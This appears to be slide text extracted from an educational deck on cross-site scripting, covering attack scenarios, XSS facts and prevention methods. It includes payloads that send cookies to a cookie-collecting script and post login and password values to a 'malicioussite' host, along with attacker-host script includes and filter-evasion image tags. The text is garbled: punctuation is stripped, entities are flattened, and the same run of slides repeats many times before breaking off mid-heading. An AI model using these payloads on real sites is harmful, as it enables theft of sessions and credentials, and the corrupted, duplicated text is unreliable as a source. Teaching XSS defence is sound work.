ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
